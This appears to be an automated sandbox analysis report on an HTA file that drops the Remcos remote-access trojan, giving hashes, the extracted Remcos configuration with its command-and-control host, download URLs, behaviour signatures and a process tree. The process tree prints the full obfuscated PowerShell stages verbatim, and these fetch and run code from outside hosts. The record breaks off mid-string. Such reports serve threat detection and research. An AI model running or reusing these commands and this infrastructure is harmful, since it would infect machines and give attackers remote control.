Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
27-08-2024 05:52
Static task
static1
Behavioral task
behavioral1
Sample
6c8ac4c656d98ff4280887b23258ecd6.hta
Resource
win7-20240704-en
General
-
Target
6c8ac4c656d98ff4280887b23258ecd6.hta
-
Size
114KB
-
MD5
6c8ac4c656d98ff4280887b23258ecd6
-
SHA1
589a5b57c1046c73dbf880fb089efd11388cc529
-
SHA256
3ee7cd63e826153e5334bcad95e91de9054286c5503b78ad03febe50eca26853
-
SHA512
58db3dd717d2e0be19f1f73bda851f785df7cc04733c19ba98c575ef865b31e37ea56e6c71c1856e75e8b878a833124a8b96e5578ba83e6c8467edc508cbf949
-
SSDEEP
96:Ea+M7+yhfLMVeeyhftGMVxFX3At4FgRbOyhfUZyhf93hFMVJhyhf2AT:Ea+Q1hfBVhfZefhfHhfDhfVT
Malware Config
Extracted
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
Extracted
remcos
zynova
cloudcare.duckdns.org:14645
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-J5EXI3
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 23 3588 powershell.exe 28 4852 powershell.exe 36 4852 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4852 powershell.exe 4356 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 3588 powershell.exe 2404 cmd.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4852 set thread context of 3696 4852 powershell.exe 103 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3588 powershell.exe 3588 powershell.exe 4356 powershell.exe 4356 powershell.exe 4852 powershell.exe 4852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3588 powershell.exe Token: SeDebugPrivilege 4356 powershell.exe Token: SeDebugPrivilege 4852 powershell.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 2376 wrote to memory of 2404 2376 mshta.exe 86 PID 2376 wrote to memory of 2404 2376 mshta.exe 86 PID 2376 wrote to memory of 2404 2376 mshta.exe 86 PID 2404 wrote to memory of 3588 2404 cmd.exe 89 PID 2404 wrote to memory of 3588 2404 cmd.exe 89 PID 2404 wrote to memory of 3588 2404 cmd.exe 89 PID 3588 wrote to memory of 4472 3588 powershell.exe 94 PID 3588 wrote to memory of 4472 3588 powershell.exe 94 PID 3588 wrote to memory of 4472 3588 powershell.exe 94 PID 4472 wrote to memory of 332 4472 csc.exe 95 PID 4472 wrote to memory of 332 4472 csc.exe 95 PID 4472 wrote to memory of 332 4472 csc.exe 95 PID 3588 wrote to memory of 3484 3588 powershell.exe 97 PID 3588 wrote to memory of 3484 3588 powershell.exe 97 PID 3588 wrote to memory of 3484 3588 powershell.exe 97 PID 3484 wrote to memory of 4356 3484 WScript.exe 98 PID 3484 wrote to memory of 4356 3484 WScript.exe 98 PID 3484 wrote to memory of 4356 3484 WScript.exe 98 PID 4356 wrote to memory of 4852 4356 powershell.exe 100 PID 4356 wrote to memory of 4852 4356 powershell.exe 100 PID 4356 wrote to memory of 4852 4356 powershell.exe 100 PID 4852 wrote to memory of 3696 4852 powershell.exe 103 PID 4852 wrote to memory of 3696 4852 powershell.exe 103 PID 4852 wrote to memory of 3696 4852 powershell.exe 103 PID 4852 wrote to memory of 3696 4852 powershell.exe 103 PID 4852 wrote to memory of 3696 4852 powershell.exe 103 PID 4852 wrote to memory of 3696 4852 powershell.exe 103 PID 4852 wrote to memory of 3696 4852 powershell.exe 103 PID 4852 wrote to memory of 3696 4852 powershell.exe 103 PID 4852 wrote to memory of 3696 4852 powershell.exe 103 PID 4852 wrote to memory of 3696 4852 powershell.exe 103 PID 4852 wrote to memory of 3696 4852 powershell.exe 103 PID 4852 wrote to memory of 3696 4852 powershell.exe 103
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\6c8ac4c656d98ff4280887b23258ecd6.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POwerSHelL.eXe -Ex BYpaSS -nOP -W 1 -C DevicEcREdENTIAlDEploYmEnt.exe ; iEx($(iEx('[syStEm.TeXt.eNCODing]'+[ChaR]58+[CHAR]58+'UTF8.gEtSTrInG([sysTem.cONvERT]'+[chAR]58+[cHar]58+'frOmbAsE64STrinG('+[CHaR]0x22+'JEZIZ3d1OWRVSE1PICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUmRFRmlOSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Umxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1BRSUNlRFQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVZ6LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJBRixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJ5bSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNaGFUV1hIWVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaeGR5WGRWYmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRGSGd3dTlkVUhNTzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvbWV1L2NyZWF0ZWRiZWF1dHlpbmJ1dHRlcnNvY2hiaXNjdXQudElGIiwiJEVudjpBUFBEQVRBXGNyZWF0ZWRiZWF1dHlpbmJ1dHRlcnNvY2hiaXNjdS52QlMiLDAsMCk7U3RBUlQtc0xFZVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlYXV0eWluYnV0dGVyc29jaGJpc2N1LnZCUyI='+[CHar]0X22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOwerSHelL.eXe -Ex BYpaSS -nOP -W 1 -C DevicEcREdENTIAlDEploYmEnt.exe ; iEx($(iEx('[syStEm.TeXt.eNCODing]'+[ChaR]58+[CHAR]58+'UTF8.gEtSTrInG([sysTem.cONvERT]'+[chAR]58+[cHar]58+'frOmbAsE64STrinG('+[CHaR]0x22+'JEZIZ3d1OWRVSE1PICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUmRFRmlOSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Umxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1BRSUNlRFQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVZ6LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJBRixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJ5bSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNaGFUV1hIWVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaeGR5WGRWYmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRGSGd3dTlkVUhNTzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvbWV1L2NyZWF0ZWRiZWF1dHlpbmJ1dHRlcnNvY2hiaXNjdXQudElGIiwiJEVudjpBUFBEQVRBXGNyZWF0ZWRiZWF1dHlpbmJ1dHRlcnNvY2hiaXNjdS52QlMiLDAsMCk7U3RBUlQtc0xFZVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlYXV0eWluYnV0dGVyc29jaGJpc2N1LnZCUyI='+[CHar]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\12auqd45\12auqd45.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80A9.tmp" "c:\Users\Admin\AppData\Local\Temp\12auqd45\CSC9A037132964C4E3AAC6E64C92557BA0.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:332
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createdbeautyinbuttersochbiscu.vBS"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⤙ ⧺ ¤ ❠ ❘Bp⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘VQBy⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘9⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘JwBo⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bw⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘Og⤙ ⧺ ¤ ❠ ❘v⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘aQBh⤙ ⧺ ¤ ❠ ❘Dg⤙ ⧺ ¤ ❠ ❘M⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘z⤙ ⧺ ¤ ❠ ❘DE⤙ ⧺ ¤ ❠ ❘M⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘0⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘dQBz⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘YQBy⤙ ⧺ ¤ ❠ ❘GM⤙ ⧺ ¤ ❠ ❘a⤙ ⧺ ¤ ❠ ❘Bp⤙ ⧺ ¤ ❠ ❘HY⤙ ⧺ ¤ ❠ ❘ZQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘G8⤙ ⧺ ¤ ❠ ❘cgBn⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘Mg⤙ ⧺ ¤ ❠ ❘3⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘aQB0⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bQBz⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘dgBi⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘Xw⤙ ⧺ ¤ ❠ ❘y⤙ ⧺ ¤ ❠ ❘D⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘Mg⤙ ⧺ ¤ ❠ ❘0⤙ ⧺ ¤ ❠ ❘D⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘Nw⤙ ⧺ ¤ ❠ ❘y⤙ ⧺ ¤ ❠ ❘DY⤙ ⧺ ¤ ❠ ❘Xw⤙ ⧺ ¤ ❠ ❘y⤙ ⧺ ¤ ❠ ❘D⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘Mg⤙ ⧺ ¤ ❠ ❘0⤙ ⧺ ¤ ❠ ❘D⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘Nw⤙ ⧺ ¤ ❠ ❘y⤙ ⧺ ¤ ❠ ❘DY⤙ ⧺ ¤ ❠ ❘LwB2⤙ ⧺ ¤ ❠ ❘GI⤙ ⧺ ¤ ❠ ❘cw⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘Go⤙ ⧺ ¤ ❠ ❘c⤙ ⧺ ¤ ❠ ❘Bn⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘Hc⤙ ⧺ ¤ ❠ ❘ZQBi⤙ ⧺ ¤ ❠ ❘EM⤙ ⧺ ¤ ❠ ❘b⤙ ⧺ ¤ ❠ ❘Bp⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bgB0⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘PQ⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘E4⤙ ⧺ ¤ ❠ ❘ZQB3⤙ ⧺ ¤ ❠ ❘C0⤙ ⧺ ¤ ❠ ❘TwBi⤙ ⧺ ¤ ❠ ❘Go⤙ ⧺ ¤ ❠ ❘ZQBj⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘BT⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘cwB0⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘E4⤙ ⧺ ¤ ❠ ❘ZQB0⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘VwBl⤙ ⧺ ¤ ❠ ❘GI⤙ ⧺ ¤ ❠ ❘QwBs⤙ ⧺ ¤ ❠ ❘Gk⤙ ⧺ ¤ ❠ ❘ZQBu⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘Gk⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘Gc⤙ ⧺ ¤ ❠ ❘ZQBC⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘9⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘B3⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘YgBD⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘aQBl⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘EQ⤙ ⧺ ¤ ❠ ❘bwB3⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘b⤙ ⧺ ¤ ❠ ❘Bv⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘BE⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘Cg⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bp⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘VQBy⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘KQ⤙ ⧺ ¤ ❠ ❘7⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘aQBt⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘ZwBl⤙ ⧺ ¤ ❠ ❘FQ⤙ ⧺ ¤ ❠ ❘ZQB4⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘9⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘WwBT⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘cwB0⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘FQ⤙ ⧺ ¤ ❠ ❘ZQB4⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘LgBF⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘YwBv⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘aQBu⤙ ⧺ ¤ ❠ ❘Gc⤙ ⧺ ¤ ❠ ❘XQ⤙ ⧺ ¤ ❠ ❘6⤙ ⧺ ¤ ❠ ❘Do⤙ ⧺ ¤ ❠ ❘VQBU⤙ ⧺ ¤ ❠ ❘EY⤙ ⧺ ¤ ❠ ❘O⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘Ec⤙ ⧺ ¤ ❠ ❘ZQB0⤙ ⧺ ¤ ❠ ❘FM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘By⤙ ⧺ ¤ ❠ ❘Gk⤙ ⧺ ¤ ❠ ❘bgBn⤙ ⧺ ¤ ❠ ❘Cg⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bp⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘QgB5⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘ZQBz⤙ ⧺ ¤ ❠ ❘Ck⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BG⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘PQ⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘P⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘8⤙ ⧺ ¤ ❠ ❘EI⤙ ⧺ ¤ ❠ ❘QQBT⤙ ⧺ ¤ ❠ ❘EU⤙ ⧺ ¤ ❠ ❘Ng⤙ ⧺ ¤ ❠ ❘0⤙ ⧺ ¤ ❠ ❘F8⤙ ⧺ ¤ ❠ ❘UwBU⤙ ⧺ ¤ ❠ ❘EE⤙ ⧺ ¤ ❠ ❘UgBU⤙ ⧺ ¤ ❠ ❘D4⤙ ⧺ ¤ ❠ ❘Pg⤙ ⧺ ¤ ❠ ❘n⤙ ⧺ ¤ ❠ ❘Ds⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘BG⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘PQ⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘P⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘8⤙ ⧺ ¤ ❠ ❘EI⤙ ⧺ ¤ ❠ ❘QQBT⤙ ⧺ ¤ ❠ ❘EU⤙ ⧺ ¤ ❠ ❘Ng⤙ ⧺ ¤ ❠ ❘0⤙ ⧺ ¤ ❠ ❘F8⤙ ⧺ ¤ ❠ ❘RQBO⤙ ⧺ ¤ ❠ ❘EQ⤙ ⧺ ¤ ❠ ❘Pg⤙ ⧺ ¤ ❠ ❘+⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BJ⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘Hg⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘9⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bp⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘V⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘Hg⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘Ek⤙ ⧺ ¤ ❠ ❘bgBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘e⤙ ⧺ ¤ ❠ ❘BP⤙ ⧺ ¤ ❠ ❘GY⤙ ⧺ ¤ ❠ ❘K⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BG⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘Ck⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bgBk⤙ ⧺ ¤ ❠ ❘Ek⤙ ⧺ ¤ ❠ ❘bgBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘e⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘D0⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘Gk⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘Gc⤙ ⧺ ¤ ❠ ❘ZQBU⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘e⤙ ⧺ ¤ ❠ ❘B0⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘SQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘ZQB4⤙ ⧺ ¤ ❠ ❘E8⤙ ⧺ ¤ ❠ ❘Zg⤙ ⧺ ¤ ❠ ❘o⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘ZQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘RgBs⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘Zw⤙ ⧺ ¤ ❠ ❘p⤙ ⧺ ¤ ❠ ❘Ds⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bz⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘YQBy⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘SQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘ZQB4⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘LQBn⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ 